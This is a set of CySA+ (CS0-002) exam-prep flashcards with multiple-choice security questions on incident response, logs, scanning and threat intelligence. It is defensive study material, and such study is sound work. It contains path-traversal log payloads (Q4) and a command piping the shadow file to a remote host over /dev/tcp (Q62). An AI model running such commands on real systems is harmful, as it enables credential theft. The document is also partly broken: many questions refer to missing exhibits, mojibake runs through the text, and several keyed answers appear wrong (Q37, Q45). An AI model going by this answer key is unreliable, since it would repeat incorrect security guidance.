CSO-002 Part 2 Flashcards

1
Q

A large software company wants to move its source control and deployment pipelines into a cloud-computing environment. Due to the nature of the business, management determines the recovery time objective needs to be within one hour. Which of the following strategies would put the company in the BEST position to achieve the desired recovery time?

A. Establish an alternate site with active replication to other regions
B. Configure a duplicate environment in the same region and load balance between both instances
C. Set up every cloud component with duplicated copies and auto-scaling turned on
D. Create a duplicate copy on premises that can be used for failover in a disaster situation

A

A. Establish an alternate site with active replication to other regions

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

A cybersecurity analyst is reading a daily intelligence digest of new vulnerabilities. The type of vulnerability that should be disseminated FIRST is one that:

A. enables remote code execution that is being exploited in the wild
B. enables data leakage but is not known to be in the environment
C. enables lateral movement and was reported as a proof of concept
D. affected the organization in the past but was probably contained and eradicated

A

A. enables remote code execution that is being exploited in the wild

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

A companyג€™s incident response team is handling a threat that was identified on the network. Security analysts have determined a web server is making multiple connections from TCP port 445 outbound to servers inside its subnet as well as at remote sites. Which of the following is the MOST appropriate next step in the incident response plan?

A. Quarantine the web server
B. Deploy virtual firewalls
C. Capture a forensic image of the memory and disk
D. Enable web server containerization

A

A. Quarantine the web server

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

During an incident, a cybersecurity analyst found several entries in the web server logs that are related to an IP with a bad reputation. Which of the following would cause the analyst to further review the incident?

A. BadReputationIp - - [2019-04-12 10:43Z] ג€GET /etc/passwdג€ 403 1023
B. BadReputationIp - - [2019-04-12 10:43Z] ג€GET /index.html?src=../.ssh/id_rsaג€ 401 17044
C. BadReputationIp - - [2019-04-12 10:43Z] ג€GET /a.php?src=/etc/passwdג€ 403 11056
D. BadReputationIp - - [2019-04-12 10:43Z] ג€GET /a.php?src=../../.ssh/id_rsaג€ 200 15036
E. BadReputationIp - - [2019-04-12 10:43Z] ג€GET /favicon.ico?src=../usr/share/iconsג€ 200 19064

A

D. BadReputationIp - - [2019-04-12 10:43Z] ג€GET /a.php?src=../../.ssh/id_rsaג€ 200 15036

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

A developer wrote a script to make names and other PII data unidentifiable before loading a database export into the testing system. Which of the following describes the type of control that is being used?

A. Data encoding
B. Data masking
C. Data loss prevention
D. Data classification

A

B. Data masking

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Which of the following attacks can be prevented by using output encoding?

A. Server-side request forgery
B. Cross-site scripting
C. SQL injection
D. Command injection
E. Cross-site request forgery
F. Directory traversal
A

B. Cross-site scripting

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

The help desk provided a security analyst with a screenshot of a userג€™s desktop:

For which of the following is aircrack-ng being used?

A. Wireless access point discovery
B. Rainbow attack
C. Brute-force attack
D. PCAP data collection

A

C. Brute-force attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

A security manager has asked an analyst to provide feedback on the results of a penetration test. After reviewing the results, the manager requests information regarding the possible exploitation of vulnerabilities. Which of the following information data points would be MOST useful for the analyst to provide to the security manager, who would then communicate the risk factors to senior management? (Choose two.)

A. Probability
B. Adversary capability
C. Attack vector
D. Impact
E. Classification
F. Indicators of compromise
A

A. Probability

D. Impact

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

A security analyst has been alerted to several emails that show evidence an employee is planning malicious activities that involve employee PII on the network before leaving the organization. The security analystג€™s BEST response would be to coordinate with the legal department and:

A. the public relations department
B. senior leadership
C. law enforcement
D. the human resources department

A

D. the human resources department

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

While preparing for an audit of information security controls in the environment, an analyst outlines a framework control that has the following requirements:
✑ All sensitive data must be classified.
✑ All sensitive data must be purged on a quarterly basis.
✑ Certificates of disposal must remain on file for at least three years.
This framework control is MOST likely classified as:

A. prescriptive
B. risk-based
C. preventive
D. corrective

A

A. prescriptive

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

An analyst performs a routine scan of a host using Nmap and receives the following output:

Port 22/23/80 are open

Which of the following should the analyst investigate FIRST?
A. Port 21
B. Port 22
C. Port 23
D. Port 80
A

C. Port 23

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

A security analyst at a technology solutions firm has uncovered the same vulnerabilities on a vulnerability scan for a long period of time. The vulnerabilities are on systems that are dedicated to the firmג€™s largest client. Which of the following is MOST likely inhibiting the remediation efforts?

A. The parties have an MOU between them that could prevent shutting down the systems
B. There is a potential disruption of the vendor-client relationship
C. Patches for the vulnerabilities have not been fully tested by the software vendor
D. There is an SLA with the client that allows very little downtime

A

D. There is an SLA with the client that allows very little downtime

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

A security analyst gathered forensics from a recent intrusion in preparation for legal proceedings. The analyst used EnCase to gather the digital forensics, cloned the hard drive, and took the hard drive home for further analysis. Which of the following did the security analyst violate?

A. Cloning procedures
B. Chain of custody
C. Hashing procedures
D. Virtualization

A

B. Chain of custody

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

A threat feed notes malicious actors have been infiltrating companies and exfiltrating data to a specific set of domains. Management at an organization wants to know if it is a victim. Which of the following should the security analyst recommend to identify this behavior without alerting any potential malicious actors?

A. Create an IPS rule to block these domains and trigger an alert within the SIEM tool when these domains are requested.
B. Add the domains to a DNS sinkhole and create an alert in the SIEM tool when the domains are queried
C. Look up the IP addresses for these domains and search firewall logs for any traffic being sent to those IPs over port 443
D. Query DNS logs with a SIEM tool for any hosts requesting the malicious domains and create alerts based on this information

A

B. Add the domains to a DNS sinkhole and create an alert in the SIEM tool when the domains are queried

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

A security analyst discovered a specific series of IP addresses that are targeting an organization. None of the attacks have been successful. Which of the following should the security analyst perform NEXT?

A. Begin blocking all IP addresses within that subnet
B. Determine the attack vector and total attack surface
C. Begin a kill chain analysis to determine the impact
D. Conduct threat research on the IP addresses

A

D. Conduct threat research on the IP addresses

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

Which of the following is the MOST important objective of a post-incident review?

A. Capture lessons learned and improve incident response processes
B. Develop a process for containment and continue improvement efforts
C. Identify new technologies and strategies to remediate
D. Identify a new management strategy

A

A. Capture lessons learned and improve incident response processes

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

An organization was alerted to a possible compromise after its proprietary data was found for sale on the Internet. An analyst is reviewing the logs from the next- generation UTM in an attempt to find evidence of this breach. Given the following output:

Which of the following should be the focus of the investigation?

A. webserver.org-dmz.org
B. sftp.org-dmz.org
C. 83hht23.org-int.org
D. ftps.bluemed.net

A

A. webserver.org-dmz.org

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

A company wants to establish a threat-hunting team. Which of the following BEST describes the rationale for integrating intelligence into hunt operations?

A. It enables the team to prioritize the focus areas and tactics within the companyג€™s environment
B. It provides criticality analyses for key enterprise servers and services
C. It allows analysts to receive routine updates on newly discovered software vulnerabilities
D. It supports rapid response and recovery during and following an incident

A

A. It enables the team to prioritize the focus areas and tactics within the companyג€™s environment

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

A security analyst is investigating a compromised Linux server. The analyst issues the ps command and receives the following output:

Which of the following commands should the administrator run NEXT to further analyze the compromised system?

A. strace /proc/1301
B. rpm ג€”V openssh-server
C. /bin/ls ג€”l /proc/1301/exe
D. kill -9 1301

A

A. strace /proc/1301

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

A security analyst is reviewing the following log entries to identify anomalous activity:

Which of the following attack types is occurring?

A. Directory traversal
B. SQL injection
C. Buffer overflow
D. Cross-site scripting

A

A. Directory traversal

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

A web-based front end for a business intelligence application uses pass-through authentication to authenticate users. The application then uses a service account to perform queries and look up data in a database. A security analyst discovers employees are accessing data sets they have not been authorized to use. Which of the following will fix the cause of the issue?

A. Change the security model to force the users to access the database as themselves
B. Parameterize queries to prevent unauthorized SQL queries against the database
C. Configure database security logging using syslog or a SIEM
D. Enforce unique session IDs so users do not get a reused session ID

A

A. Change the security model to force the users to access the database as themselves

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

A companyג€™s Chief Information Security Officer (CISO) is concerned about the integrity of some highly confidential files. Any changes to these files must be tied back to a specific authorized userג€™s activity session. Which of the following is the BEST technique to address the CISOג€™s concerns?

A. Configure DLP to reject all changes to the files without pre-authorization. Monitor the files for unauthorized changes.
B. Regularly use SHA-256 to hash the directory containing the sensitive information. Monitor the files for unauthorized changes.
C. Place a legal hold on the files. Require authorized users to abide by a strict time context access policy. Monitor the files for unauthorized changes.
D. Use Wireshark to scan all traffic to and from the directory. Monitor the files for unauthorized changes.

A

A. Configure DLP to reject all changes to the files without pre-authorization. Monitor the files for unauthorized changes.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

Which of the following secure coding techniques can be used to prevent cross-site request forgery attacks?

A. Input validation
B. Output encoding
C. Parameterized queries
D. Tokenization

A

D. Tokenization

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q

A security analyst scanned an internal company subnet and discovered a host with the following Nmap output.

Based on the output of this Nmap scan, which of the following should the analyst investigate FIRST?

A. Port 22
B. Port 135
C. Port 445
D. Port 3389

A

A. Port 22

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
25
Q

Which of the following technologies can be used to store digital certificates and is typically used in high-security implementations where integrity is paramount?

A. HSM
B. eFuse
C. UEFI
D. Self-encrypting drive

A

A. HSM

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
26
Q

A security analyst is investigating a malware infection that occurred on a Windows system. The system was not connected to a network and had no wireless capability. Company policy prohibits using portable media or mobile storage. The security analyst is trying to determine which user caused the malware to get onto the system. Which of the following registry keys would MOST likely have this information?

A. HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run
B. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
C. HKEY_USERS\Software\Microsoft\Windows\explorer\MountPoints2
D. HKEY_USERS\Software\Microsoft\Internet Explorer\Typed URLs
E. HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\System\iusb3hub

A

E. HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\System\iusb3hub

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
27
Q

Clients are unable to access a companyג€™s API to obtain pricing data. An analyst discovers sources other than clients are scraping the API for data, which is causing the servers to exceed available resources. Which of the following would be BEST to protect the availability of the APIs?

A. IP whitelisting
B. Certificate-based authentication
C. Virtual private network
D. Web application firewall

A

D. Web application firewall

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
28
Q

A security analyst recently discovered two unauthorized hosts on the campusג€™s wireless network segment from a man-in-the-middle attack. The security analyst also verified that privileges were not escalated, and the two devices did not gain access to other network devices. Which of the following would BEST mitigate and improve the security posture of the wireless network for this type of attack?

A. Enable MAC filtering on the wireless router and suggest a stronger encryption for the wireless network
B. Change the SSID, strengthen the passcode, and implement MAC filtering on the wireless router
C. Enable MAC filtering on the wireless router and create a whitelist that allows devices on the network
D. Conduct a wireless survey to determine if the wireless strength needs to be reduced

A

A. Enable MAC filtering on the wireless router and suggest a stronger encryption for the wireless network

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
29
Q

Given the Nmap request below:

Which of the following actions will an attacker be able to initiate directly against this host?

A. Password sniffing
B. ARP spoofing
C. A brute-force attack
D. An SQL injection

A

C. A brute-force attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
30
Q

As part of an organizationג€™s information security governance process, a Chief Information Security Officer (CISO) is working with the compliance officer to update policies to include statements related to new regulatory and legal requirements. Which of the following should be done to BEST ensure all employees are appropriately aware of changes to the policies?

A. Conduct a risk assessment based on the controls defined in the newly revised policies
B. Require all employees to attend updated security awareness training and sign an acknowledgement
C. Post the policies on the organizationג€™s intranet and provide copies of any revised policies to all active vendors
D. Distribute revised copies of policies to employees and obtain a signed acknowledgement from them

A

B. Require all employees to attend updated security awareness training and sign an acknowledgement

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
31
Q

During an investigation, an analyst discovers the following rule in an executiveג€™s email client:
IF * TO THEN mailto:
SELECT FROM ג€˜sentג€™ THEN DELETE FROM
The executive is not aware of this rule. Which of the following should the analyst do FIRST to evaluate the potential impact of this security incident?

A. Check the server logs to evaluate which emails were sent to
B. Use the SIEM to correlate logging events from the email server and the domain server
C. Remove the rule from the email client and change the password
D. Recommend that management implement SPF and DKIM

A

A. Check the server logs to evaluate which emails were sent to

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
32
Q

A critical server was compromised by malware, and all functionality was lost. Backups of this server were taken; however, management believes a logic bomb may have been injected by a rootkit. Which of the following should a security analyst perform to restore functionality quickly?

A. Work backward, restoring each backup until the server is clean
B. Restore the previous backup and scan with a live boot anti-malware scanner
C. Stand up a new server and restore critical data from backups
D. Offload the critical data to a new server and continue operations

A

C. Stand up a new server and restore critical data from backups

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
33
Q

An analyst wants to identify hosts that are connecting to the external FTP servers and what, if any, passwords are being used. Which of the following commands should the analyst use?

A. tcpdump ג€”X dst port 21
B. ftp ftp.server ג€”p 21
C. nmap ג€”o ftp.server ג€”p 21
D. telnet ftp.server 21

A

A. tcpdump ג€”X dst port 21

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
34
Q

An incident response team is responding to a breach of multiple systems that contain PII and PHI. Disclosing the incident to external entities should be based on:

A. the responderג€™s discretion
B. the public relations policy
C. the communication plan
D. senior managementג€™s guidance

A

C. the communication plan

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
35
Q

A security is responding to an incident on a web server on the company network that is making a large number of outbound requests over DNS. Which of the following is the FIRST step the analyst should take to evaluate this potential indicator of compromise?

A. Run an anti-malware scan on the system to detect and eradicate the current threat
B. Start a network capture on the system to look into the DNS requests to validate command and control traffic
C. Shut down the system to prevent further degradation of the company network
D. Reimage the machine to remove the threat completely and get back to a normal running state
E. Isolate the system on the network to ensure it cannot access other systems while evaluation is underway

A

B. Start a network capture on the system to look into the DNS requests to validate command and control traffic

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
36
Q

A security analyst needs to assess the web server versions on a list of hosts to determine which are running a vulnerable version of the software and output that list into an XML file named webserverlist.xml. The host list is provided in a file named webserverlist.txt. Which of the following Nmap commands would
BEST accomplish this goal?

A. nmap -iL webserverlist.txt -sC -p 443 -oX webserverlist.xml
B. nmap -iL webserverlist.txt -sV -p 443 -oX webserverlist.xml
C. nmap -iL webserverlist.txt -F -p 443 -oX webserverlist.xml
D. nmap –takefile webserverlist.txt –outputfileasXML webserverlist.xml ג€”scanports 443

A

B. nmap -iL webserverlist.txt -sV -p 443 -oX webserverlist.xml

-sV is for version detection

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
37
Q

Which of the following session management techniques will help to prevent a session identifier from being stolen via an XSS attack?

A. Ensuring the session identifier length is sufficient
B. Creating proper session identifier entropy
C. Applying a secure attribute on session cookies
D. Utilizing transport layer encryption on all requests
E. Implementing session cookies with the HttpOnly flag

A

B. Creating proper session identifier entropy

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
38
Q

The Chief Executive Officer (CEO) of a large insurance company has reported phishing emails that contain malicious links are targeting the entire organization.
Which of the following actions would work BEST to prevent against this type of attack?

A. Turn on full behavioral analysis to avert an infection.
B. Implement an EDR mail module that will rewrite and analyze email links.
C. Reconfigure the EDR solution to perform real-time scanning of all files.
D. Ensure EDR signatures are updated every day to avert infection.
E. Modify the EDR solution to use heuristic analysis techniques for malware.

A

B. Implement an EDR mail module that will rewrite and analyze email links.

39
Q

Which of the following sources would a security analyst rely on to provide relevant and timely threat information concerning the financial services industry?

A. Real-time and automated firewall rules subscriptions
B. Open-source intelligence, such as social media and blogs
C. Information sharing and analysis membership
D. Common vulnerability and exposure bulletins

A

C. Information sharing and analysis membership

40
Q

The Chief Information Officer (CIO) for a large manufacturing organization has noticed a significant number of unknown devices with possible malware infections are on the organization’s corporate network. Which of the following would work BEST to prevent the issue?

A. Reconfigure the NAC solution to prevent access based on a full device profile and ensure antivirus is installed.
B. Segment the network to isolate all systems that contain highly sensitive information, such as intellectual property.
C. Implement certificate validation on the VPN to ensure only employees with the certificate can access the company network.
D. Update the antivirus configuration to enable behavioral and real-time analysis on all systems within the network.

A

A. Reconfigure the NAC solution to prevent access based on a full device profile and ensure antivirus is installed.

41
Q

A security analyst recently used Arachni to perform a vulnerability assessment of a newly developed web application. The analyst is concerned about the following output:

Which of the following is the MOST likely reason for this vulnerability?

A. The developer set input validation protection on the specific field of search.aspx.
B. The developer did not set proper cross-site scripting protections in the header.
C. The developer did not implement default protections in the web application build.
D. The developer did not set proper cross-site request forgery protections.

A

A. The developer set input validation protection on the specific field of search.aspx.

42
Q

A Chief Security Officer (CSO) is working on the communication requirements for an organization’s incident response plan. In addition to technical response activities, which of the following is the main reason why communication must be addressed in an effective incident response program?

A. Public relations must receive information promptly in order to notify the community.
B. Improper communications can create unnecessary complexity and delay response actions.
C. Organizational personnel must only interact with trusted members of the law enforcement community.
D. Senior leadership should act as the only voice for the incident response team when working with forensics teams.

A

B. Improper communications can create unnecessary complexity and delay response actions.

43
Q

An information security analyst discovered a virtual machine server was compromised by an attacker. Which of the following should be the FIRST step to confirm and respond to the incident?

A. Pause the virtual machine,
B. Shut down the virtual machine.
C. Take a snapshot of the virtual machine.
D. Remove the NIC from the virtual machine.

A

A. Pause the virtual machine

44
Q

A custom script currently monitors real-time logs of a SAMIL authentication server to mitigate brute-force attacks. Which of the following is a concern when moving authentication to a cloud service?

A. Logs may contain incorrect information.
B. SAML logging is not supported for cloud-based authentication.
C. Access to logs may be delayed for some time.
D. Log data may be visible to other customers.

A

C. Access to logs may be delayed for some time.

45
Q

During a review of vulnerability scan results, an analyst determines the results may be flawed because a control-baseline system, which is used to evaluate a scanning toolג€™s effectiveness, was reported as not vulnerable. Consequently, the analyst verifies the scope of the scan included the control-baseline host, which was available on the network during the scan. The use of a control-baseline endpoint in this scenario assists the analyst in confirming:

A. verification of mitigation.
B. false positives.
C. false negatives.
D. the criticality index.
E. hardening validation.
A

A. verification of mitigation.

46
Q

An analyst is reviewing the following code output of a vulnerability scan:

Which of the following types of vulnerabilities does this MOST likely represent?

A. A XSS vulnerability
B. An HTTP response split vulnerability
C. A credential bypass vulnerability
D. A carriage-return, line-feed vulnerability

A

A. A XSS vulnerability

47
Q

The threat intelligence department recently learned of an advanced persistent threat that is leveraging a new strain of malware, exploiting a system router. The company currently uses the same device mentioned in the threat report. Which of the following configuration changes would BEST improve the organizationג€™s security posture?

A. Implement an IPS rule that contains content for the malware variant and patch the routers to protect against the vulnerability
B. Implement an IDS rule that contains the IP addresses from the advanced persistent threat and patch the routers to protect against the vulnerability
C. Implement an IPS rule that contains the IP addresses from the advanced persistent threat and patch the routers to protect against the vulnerability
D. Implement an IDS rule that contains content for the malware variant and patch the routers to protect against the vulnerability

A

A. Implement an IPS rule that contains content for the malware variant and patch the routers to protect against the vulnerability

48
Q

An analyst is searching a log for potential credit card leaks. The log stores all data encoded in hexadecimal. Which of the following commands will allow the security analyst to confirm the incident?

A. cat log |xxd ג€”r ג€”p | egrep ג€”v ג€˜[0-9]{16}ג€™
B. egrep ג€˜(3[0-9]){16}ג€™ log
C. cat log |xxd ג€”r ג€”p | egrep ג€˜[0-9]{16}ג€™
D. egrep ג€˜[0-9]{16}ג€™ log |xxd

A

C. cat log |xxd ג€”r ג€”p | egrep ג€˜[0-9]{16}ג€™

49
Q

This is a Simulation

A

REVIEW!

50
Q

A companyג€™s senior human resources administrator left for another position, and the assistant administrator was promoted into the senior position. On the official start day, the new senior administrator planned to ask for extended access permissions but noticed the permissions were automatically granted on that day. Which of the following describes the access management policy in place at the company?

A. Mandatory-based
B. Host-based
C. Federated access
D. Role-based

A

D. Role-based

51
Q

The steering committee for information security management annually reviews the security incident register for the organization to look for trends and systematic issues. The steering committee wants to rank the risks based on past incidents to improve the security program for next year. Below is the incident register for the organization:

Which of the following should the organization consider investing in FIRST due to the potential impact of availability?

A. Hire a managed service provider to help with vulnerability management
B. Build a warm site in case of system outages
C. Invest in a failover and redundant system, as necessary
D. Hire additional staff for the IT department to assist with vulnerability management and log review

A

C. Invest in a failover and redundant system, as necessary

52
Q

A security analyst reviews a recent network capture and notices encrypted inbound traffic on TCP port 465 was coming into the companyג€™s network from a database server. Which of the following will the security analyst MOST likely identify as the reason for the traffic on this port?

A. The traffic is common static data that Windows servers send to Microsoft
B. Someone has configured an unauthorized SMTP application over SSL
C. A connection from the database to the web front end is communicating on the port
D. The server is receiving a secure connection using the new TLS 1.3 standard

A

B. Someone has configured an unauthorized SMTP application over SSL

53
Q

SIMULATION

A

REVIEW

54
Q

An organization wants to move non-essential services into a cloud computing environment. Management has a cost focus and would like to achieve a recovery time objective of 12 hours. Which of the following cloud recovery strategies would work BEST to attain the desired outcome?

A. Duplicate all services in another instance and load balance between the instances
B. Establish a hot site with active replication to another region within the same cloud provider
C. Set up a warm disaster recovery site with the same cloud provider in a different region
D. Configure the systems with a cold site at another cloud provider that can be used for failover

A

C. Set up a warm disaster recovery site with the same cloud provider in a different region

55
Q

A threat intelligence analyst has received multiple reports that are suspected to be about the same advanced persistent threat. To which of the following steps in the intelligence cycle would this map?

A. Dissemination
B. Analysis
C. Feedback
D. Requirements
E. Collection
A

E. Collection

56
Q

During an incident investigation, a security analyst acquired a malicious file that was used as a backdoor but was not detected by the antivirus application. After performing a reverse-engineering procedure, the analyst found that part of the code was obfuscated to avoid signature detection. Which of the following types of instructions should the analyst use to understand how the malware was obfuscated and to help deobfuscate it?

A. MOV
B. ADD
C. XOR
D. SUB
E. MOVL
A

C. XOR

57
Q

An organization has several systems that require specific logons. Over the past few months, the security analyst has noticed numerous failed logon attempts followed by password resets. Which of the following should the analyst do to reduce the occurrence of legitimate failed logons and password resets?

A. Use SSO across all applications
B. Perform a manual privilege review
C. Adjust the current monitoring and logging rules
D. Implement multifactor authentication

A

A. Use SSO across all applications

58
Q

An application server runs slowly and then triggers a high CPU alert. After investigating, a security analyst finds an unauthorized program is running on the server.
The analyst reviews the application log below.

Which of the following conclusions is supported by the application log?

A. An attacker was attempting to perform a DoS attack against the server
B. An attacker was attempting to download files via a remote command execution vulnerability
C. An attacker was attempting to perform a buffer overflow attack to execute a payload in memory
D. An attacker was attempting to perform an XSS attack via a vulnerable third-party library

A

B. An attacker was attempting to download files via a remote command execution vulnerability

59
Q

A security analyst is reviewing the following requirements for new time clocks that will be installed in a shipping warehouse:
✑ The clocks must be configured so they do not respond to ARP broadcasts.
✑ The server must be configured with static ARP entries for each clock.

Which of the following types of attacks will this configuration mitigate?

A. Spoofing
B. Overflows
C. Rootkits
D. Sniffing

A

A. Spoofing

static arp = anti-spoofing

60
Q

A security analyst is attempting to utilize the following threat intelligence for developing detection capabilities:
APT Xג€™s approach to a target would be sending a phishing email to the target after conducting active and passive reconnaissance. Upon successful compromise, APT X conducts internal reconnaissance and attempts to move laterally by utilizing existing resources. When APT X finds data that aligns to its objectives, it stages and then exfiltrates data sets in sizes that can range from 1GB to 5GB. APT X also establishes several backdoors to maintain a C2 presence in the environment.

In which of the following phases in this APT MOST likely to leave discoverable artifacts?
A. Data collection/exfiltration
B. Defensive evasion
C. Lateral movement
D. Reconnaissance
A

A. Data collection/exfiltration

SIEM will detect data spikes

61
Q

A security analyst is scanning the network to determine if a critical security patch was applied to all systems in an enterprise. The organization has a very low tolerance for risk when it comes to resource availability. Which of the following is the BEST approach for configuring and scheduling the scan?

A. Make sure the scan is credentialed, covers all hosts in the patch management system, and is scheduled during business hours so it can be terminated if it affects business operations.
B. Make sure the scan is uncredentialed, covers all hosts in the patch management system, and is scheduled during off-business hours so it has the least impact on operations.
C. Make sure the scan is credentialed, has the latest software and signature versions, covers all hosts in the patch management system, and is scheduled during off-business hours so it has the least impact on operations.
D. Make sure the scan is credentialed, uses a limited plugin set, scans all host IP addresses in the enterprise, and is scheduled during off-business hours so it has the least impact on operations.

A

D. Make sure the scan is credentialed, uses a limited plugin set, scans all host IP addresses in the enterprise, and is scheduled during off-business hours so it has the least impact on operations.

62
Q

During a routine log review, a security analyst has found the following commands that cannot be identified from the Bash history log on the root user:

Line 1 logger keeping track of my activity
Line 2 tail -1 /vvar/log/syslog
Line 3 lvextend -L +50G /dev/volg1/secret
Line 4 rm -rf1 /tmp/DFt5Gsd3
Line 5 cat /etc/s*w > /dev/tcp/10.0.0.1/8080
Line 6 yum install httpd –assumeyes

Which of the following commands should the analyst investigate FIRST?

A. Line 1
B. Line 2
C. Line 3
D. Line 4
E. Line 5
F. Line 6
A

E. Line 5

63
Q

A security analyst is probing a companyג€™s public-facing servers for vulnerabilities and obtains the following output:

Which of the following changes should the analyst recommend FIRST?

A. Implement File Transfer Protocol Secure on the upload server
B. Disable anonymous login on the web server
C. Configure firewall changes to close port 445 on 124.45.23.112
D. Apply a firewall rule to filter the number of requests per second on port 80 on 124.45.23.108

A

C. Configure firewall changes to close port 445 on 124.45.23.112

64
Q

While reviewing log files, a security analyst uncovers a brute-force attack that is being performed against an external webmail portal. Which of the following would be BEST to prevent this type of attack from being successful?

A. Create a new rule in the IDS that triggers an alert on repeated login attempts
B. Implement MFA on the email portal using out-of-band code delivery
C. Alter the lockout policy to ensure users are permanently locked out after five attempts
D. Leverage password filters to prevent weak passwords on employee accounts from being exploited
E. Configure a WAF with brute-force protection rules in block mode

A

B. Implement MFA on the email portal using out-of-band code delivery

65
Q

A security analyst reviews SIEM logs and detects a well-known malicious executable running in a Windows machine. The up-to-date antivirus cannot detect the malicious executable. Which of the following is the MOST likely cause of this issue?

A. The malware is fileless and exists only in physical memory
B. The malware detects and prevents its own execution in a virtual environment
C. The antivirus does not have the malwareג€™s signature
D. The malware is being executed with administrative privileges

A

A. The malware is fileless and exists only in physical memory

66
Q

A security engineer is reviewing security products that identify malicious actions by users as part of a companyג€™s insider threat program. Which of the following is the MOST appropriate product category for this purpose?

A. SCAP
B. SOAR
C. UEBA
D. WAF

A

C. UEBA

67
Q

A large organization wants to move account registration services to the cloud to benefit from faster processing and elasticity. Which of the following should be done FIRST to determine the potential risk to the organization?

A. Establish a recovery time objective and a recovery point objective for the systems being moved
B. Calculate the resource requirements for moving the systems to the cloud
C. Determine recovery priorities for the assets being moved to the cloud-based systems
D. Identify the business processes that will be migrated and the criticality of each one
E. Perform an inventory of the servers that will be moving and assign priority to each one

A

D. Identify the business processes that will be migrated and the criticality of each one

68
Q

A security analyst is reviewing the following DNS logs as part of security-monitoring activities:

Which of the following MOST likely occurred?

A. The attack used an algorithm to generate command and control information dynamically
B. The attack attempted to contact www.google.com to verify Internet connectivity
C. The attack used encryption to obfuscate the payload and bypass detection by an IDS
D. The attack caused an internal host to connect to a command and control server

A

D. The attack caused an internal host to connect to a command and control server

69
Q

A security analyst is required to stay current with the most recent threat data and intelligence reports. When gathering data, it is MOST important for the data to be:

A. proprietary and timely
B. proprietary and accurate
C. relevant and deep
D. relevant and accurate

A

D. relevant and accurate

70
Q

As a proactive threat-hunting technique, hunters must develop situational cases based on likely attack scenarios derived from the available threat intelligence information. After forming the basis of the scenario, which of the following may the threat hunter construct to establish a framework for threat assessment?

A. Critical asset list
B. Threat vector
C. Attack profile
D. Hypothesis

A

D. Hypothesis

71
Q

Employees of a large financial company are continuously being infected by strands of malware that are not detected by EDR tools. Which of the following is the
BEST security control to implement to reduce corporate risk while allowing employees to exchange files at client sites?

A. MFA on the workstations
B. Additional host firewall rules
C. VDI environment
D. Hard drive encryption
E. Network access control
F. Network segmentation
A

C. VDI environment

72
Q

An executive assistant wants to onboard a new cloud-based product to help with business analytics and dashboarding. Which of the following would be the BEST integration option for this service?

A. Manually log in to the service and upload data files on a regular basis
B. Have the internal development team script connectivity and file transfers to the new service
C. Create a dedicated SFTP site and schedule transfers to ensure file transport security
D. Utilize the cloud productג€™s API for supported and ongoing integrations

A

D. Utilize the cloud productג€™s API for supported and ongoing integrations

73
Q

A security analyst received a series of antivirus alerts from a workstation segment, and users reported ransomware messages. During lessons-learned activities, the analyst determines the antivirus was able to alert to abnormal behavior but did not stop this newest variant of ransomware. Which of the following actions should be taken to BEST mitigate the effects of this type of threat in the future?

A. Enabling sandboxing technology
B. Purchasing cyber insurance
C. Enabling application blacklisting
D. Installing a firewall between the workstations and Internet

A

A. Enabling sandboxing technology

74
Q

A bad actor bypasses authentication and reveals all records in a database through an SQL injection. Implementation of which of the following would work BEST to prevent similar attacks in the future?

A. Strict input validation
B. Blacklisting
C. SQL patching
D. Content filtering
E. Output encoding
A

A. Strict input validation

75
Q

A cybersecurity analyst is dissecting an intrusion down to the specific techniques and wants to organize them in a logical manner. Which of the following frameworks would BEST apply in this situation?

A. Pyramid of Pain
B. MITRE ATT&CK
C. Diamond Model of Intrusion Analysis
D. CVSS v3.0

A

B. MITRE ATT&CK

76
Q

An organization used a third party to conduct a security audit and discovered several deficiencies in the cybersecurity program. The findings noted many external vulnerabilities that were not caught by the vulnerability scanning software, numerous weaknesses that allowed lateral movement, and gaps in monitoring that did not detect the activity of the auditors. Based on these findings, which of the following would be the BEST long-term enhancement to the security program?

A. Quarterly external penetration testing
B. Monthly tabletop scenarios
C. Red-team exercises
D. Audit exercise

A

D. Audit exercises

77
Q

An information security analyst on a threat-hunting team is working with administrators to create a hypothesis related to an internally developed web application.
The working hypothesis is as follows:
✑ Due to the nature of the industry, the application hosts sensitive data associated with many clients and is a significant target.
✑ The platform is most likely vulnerable to poor patching and inadequate server hardening, which expose vulnerable services.
